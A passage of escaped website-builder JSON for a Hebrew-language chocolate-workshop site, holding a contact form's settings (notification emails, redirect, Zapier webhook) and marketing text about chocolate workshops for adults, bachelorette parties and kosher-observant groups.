"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"field_8327e13\",\"field_type\":\"select\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\",\"_id\":\"8327e13\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"25\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"webhooks\":\"https:\\/\\/hooks.zapier.com\\/hooks\\/catch\\/2852444\\/osyxhok\\/\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"242ff005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22f159fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23fc1b4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3<\\/u><u>, <\\/u><u>\\u05db\\u05dc \\u05d0\\u05d7\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc<\\/u><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4, \\u05e9\\u05de\\u05d5\\u05e2\\u05d1\\u05e8\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e0\\u05e2\\u05d9\\u05de\\u05d4, \\u05db\\u05d9\\u05d9\\u05e4\\u05d9\\u05ea \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e8\\u05d5\\u05d1 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05e7\\u05d4\\u05dc \\u05d4\\u05d9\\u05e2\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05e8\\u05d1\\u05d9\\u05dd \\u05d8\\u05d5\\u05e2\\u05d9\\u05dd \\u05dc\\u05d7\\u05e9\\u05d5\\u05d1 \\u05db\\u05d9 \\u05d9\\u05e9 \\u05e6\\u05d5\\u05e8\\u05da \\u05d1\\u05d9\\u05d3\\u05e2 \\u05e7\\u05d5\\u05d3\\u05dd, \\u05d0\\u05d5 \\u05d1\\u05dc\\u05d9\\u05de\\u05d5\\u05d3\\u05d9\\u05dd \\u05e7\\u05d5\\u05d3\\u05de\\u05d9\\u05dd, \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05e0\\u05d9\\u05e1\\u05d9\\u05d5\\u05df \\u05e2\\u05ea\\u05d9\\u05e8 \\u05e9\\u05e0\\u05d9\\u05dd \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05d6\\u05d5, \\u05d0\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05db\\u05da \\u05d4\\u05d3\\u05d1\\u05e8. \\u05e2\\u05dd \\u05e7\\u05e6\\u05ea \\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05e1\\u05e7\\u05e8\\u05e0\\u05d5\\u05ea \\u05db\\u05d5\\u05dc\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05ea. \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e9\\u05dc\\u05d1 \\u05d0\\u05d7\\u05e8\\u05d9 \\u05e9\\u05dc\\u05d1 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05d7\\u05dc \\u05de\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1\\u05d9\\u05dd \\u05d5\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05e2\\u05d3 \\u05dc\\u05d8\\u05d1\\u05dc\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea, \\u05e9\\u05de\\u05e9\\u05dc\\u05d1\\u05d5\\u05ea \\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d5\\u05d8\\u05e2\\u05de\\u05d9\\u05dd \\u05e0\\u05d4\\u05d3\\u05e8\\u05d9\\u05dd. \\u05db\\u05dc \\u05de\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d9\\u05e6\\u05d0 \\u05e2\\u05dd \\u05e7\\u05d5\\u05e4\\u05e1\\u05ea \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05d5, \\u05d5\\u05e2\\u05dd \\u05d7\\u05d5\\u05d1\\u05e8\\u05ea \\u05de\\u05ea\\u05db\\u05d5\\u05e0\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d1\\u05e7\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05d4 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd \\u05d2\\u05dd \\u05d1\\u05d4\\u05de\\u05e9\\u05da, \\u05d5\\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05ea \\u05d4\\u05de\\u05e9\\u05e4\\u05d7\\u05d4 \\u05d5\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd. \\u05ea\\u05ea\\u05db\\u05d5\\u05e0\\u05e0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d0\\u05dc\\u05d5 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d0\\u05d9\\u05dd \\u05e2\\u05da \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05de\\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05d5\\u05d4\\u05dc\\u05d0\\u05d4.\\u00a0\\u00a0<\\/p><p>\\u00a0<\\/p><p><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8<\\/u><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05d5\\u05e9\\u05d4 \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8. \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d4\\u05dd \\u05d4\\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05e9\\u05e4\\u05e2\\u05d4 \\u05e2\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05d5\\u05dc \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d5\\u05e2\\u05dc \\u05d4\\u05ea\\u05d5\\u05e6\\u05d0\\u05d4 \\u05d4\\u05e1\\u05d5\\u05e4\\u05d9\\u05ea \\u05db\\u05d5\\u05dc\\u05d4. \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5 \\u05db\\u05dc\\u05d9\\u05dd \\u05e1\\u05d8\\u05e0\\u05d3\\u05e8\\u05d8\\u05d9\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05de\\u05d8\\u05d1\\u05d7 \\u05d1\\u05d9\\u05ea\\u05d9, \\u05d5\\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05d1\\u05d7\\u05e0\\u05d5\\u05d9\\u05d5\\u05ea \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05d5\\u05d1\\u05e1\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd. \\u05de\\u05d8\\u05e8\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05dc\\u05d4\\u05e0\\u05d2\\u05d9\\u05e9 \\u05dc\\u05d1\\u05e9\\u05dc\\u05e0\\u05d9\\u05dd \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05dc\\u05e4\\u05e9\\u05d5\\u05d8 \\u05d0\\u05ea \\u05d4\\u05db\\u05e0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e4\\u05d2\\u05d5\\u05dd \\u05d1\\u05d8\\u05e2\\u05dd, \\u05d1\\u05de\\u05e8\\u05e7\\u05dd \\u05d0\\u05d5 \\u05d1\\u05e0\\u05e8\\u05d0\\u05d5\\u05ea \\u05d4\\u05db\\u05d5\\u05dc\\u05dc\\u05ea. \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05d0\\u05d9\\u05d6\\u05d4 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05ea\\u05dd \\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d0\\u05d9\\u05dd \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05dc\\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4, \\u05dc\\u05d7\\u05d2\\u05d9\\u05d2\\u05d5\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05dc\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d5\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea.<\\/p><p>\\u00a0<\\/p><p><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/u><u>, <\\/u><u>\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d5\\u05de\\u05d4\\u05e0\\u05d4<\\/u><\\/p><p>\\u05d0\\u05d6 \\u05d1\\u05d5\\u05d0\\u05d5 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05e8\\u05d2\\u05e2 \\u05dc\\u05db\\u05dc\\u05d4 \\u05e9\\u05dc\\u05e0\\u05d5, \\u05e9\\u05d1\\u05ea\\u05d5\\u05e8 \\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc\\u05d4, \\u05d0\\u05ea\\u05df \\u05d5\\u05d3\\u05d0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05e2\\u05e8\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05df, \\u05d5\\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d4 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e2\\u05dd \\u05d4\\u05e8\\u05d1\\u05d4 \\u05e6\\u05d7\\u05d5\\u05e7, \\u05d4\\u05e0\\u05d0\\u05d4, \\u05e9\\u05de\\u05d7\\u05d4 \\u05d5\\u05d2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05dc\\u05e9\\u05d3\\u05e8\\u05d2 \\u05dc\\u05db\\u05dd \\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05ea\\u05e8. \\u05d4\\u05e8\\u05d9 \\u05d0\\u05d9\\u05df \\u05e1\\u05d9\\u05db\\u05d5\\u05d9 \\u05e9\\u05ea\\u05e2\\u05d1\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05dc\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05dc\\u05e4\\u05d7\\u05d5\\u05ea, \\u05d0\\u05d6 \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d8\\u05d5\\u05d1 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d5\\u05ea\\u05d5 \\u05db\\u05d5\\u05dc\\u05dd \\u05d9\\u05d7\\u05d3? \\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7 \\u05e9\\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05d6\\u05d5 \\u05db\\u05d5\\u05dc\\u05db\\u05df \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d1\\u05e8\\u05df\\u05d5 \\u05d4\\u05de\\u05d5\\u05df \\u05d9\\u05d3\\u05e2 \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05ea\\u05ea\\u05e2\\u05e1\\u05e7\\u05d5 \\u05d1\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df, \\u05d5\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05d3\\u05d9 \\u05d1\\u05d8\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d6\\u05d4 \\u05e2\\u05e8\\u05d1 \\u05e9\\u05d4\\u05db\\u05dc\\u05d4 \\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7.<\\/p><p>\\u00a0<\\/p><p><u>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05dc\\u05e6\\u05d9\\u05d1\\u05d5\\u05e8 \\u05d4\\u05e9\\u05d5\\u05de\\u05e8\\u05d9\\u05dd<\\/u><\\/p><p>\\u05d0\\u05dd \\u05d9\\u05e9 \\u05d1\\u05d7\\u05d1\\u05d5\\u05e8\\u05ea \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d5\\u05ea \\u05d1\\u05e0\\u05d5\\u05ea \\u05e9\\u05e9\\u05d5\\u05de\\u05e8\\u05d5\\u05ea \\u05de\\u05e1\\u05d5\\u05e8\\u05ea \\u05d0\\u05d5 \\u05e9\\u05d5\\u05de\\u05e8\\u05d5\\u05ea \\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d0\\u05dc \\u05d3\\u05d0\\u05d2\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05dc\\u05d8\\u05d5\\u05d1\\u05ea \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05e7\\u05e4\\u05d9\\u05d3\\u05d5\\u05ea. \\u05d4\\u05e8\\u05d1\\u05d4 \\u05e4\\u05e2\\u05de\\u05d9\\u05dd \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05d1\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05d4\\u05d5\\u05e4\\u05da \\u05d1\\u05e2\\u05d9\\u05d9\\u05ea\\u05d9 \\u05d1\\u05e2\\u05e7\\u05d1\\u05d5\\u05ea \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05db\\u05d1\\u05d3 \\u05db\\u05dc \\u05d0\\u05d7\\u05ea \\u05d1\\u05d0\\u05de\\u05d5\\u05e0\\u05ea\\u05d4, \\u05d5\\u05d4\\u05e0\\u05d9\\u05e1\\u05d9\\u05d5\\u05df \\u05dc\\u05e9\\u05dc\\u05d1 \\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05db\\u05e9\\u05e8. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4 \\u05e9\\u05dc\\u05db\\u05df, \\u05ea\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d1\\u05e2\\u05d9\\u05d4, \\u05d5\\u05ea\\u05e1\\u05d9\\u05d9\\u05e2 \\u05dc\\u05db\\u05df \\u05d1\\u05e4\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7. \\u05d4\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05e9\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05dc\\u05d1\\u05d3, \\u05db\\u05da \\u05e9\\u05d0\\u05d9\\u05e0\\u05dd \\u05d1\\u05d0\\u05d9\\u05dd \\u05d1\\u05de\\u05d2\\u05e2 \\u05e2\\u05dd \\u05d1\\u05e9\\u05e8, \\u05d0\\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d2\\u05dc\\u05dd \\u05d7\\u05dc\\u05d1\\u05d9\\u05d9\\u05dd \\u05d0\\u05d5 \\u05e4\\u05e8\\u05d5\\u05d5\\u05d4, \\u05d4\\u05e7\\u05de\\u05d7\\u05d9\\u05dd \\u05db\\u05d5\\u05dc\\u05dd \\u05de\\u05e0\\u05d5\\u05e4\\u05d9\\u05dd \\u05db\\u05d3\\u05ea \\u05d5\\u05db\\u05d3\\u05d9\\u05df, \\u05d5\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05d9\\u05e9\\u05d5\\u05e8 \\u05e8\\u05d1\\u05e0\\u05d5\\u05ea \\u05db\\u05de\\u05d5\\u05d1\\u05df. \\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df? \\u05de\\u05d5\\u05db\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05dc\\u05db\\u05dc\\u05d4 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7 \\u05e2\\u05dd \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05e9\\u05de\\u05d7? \\u05ea\\u05e0\\u05d5 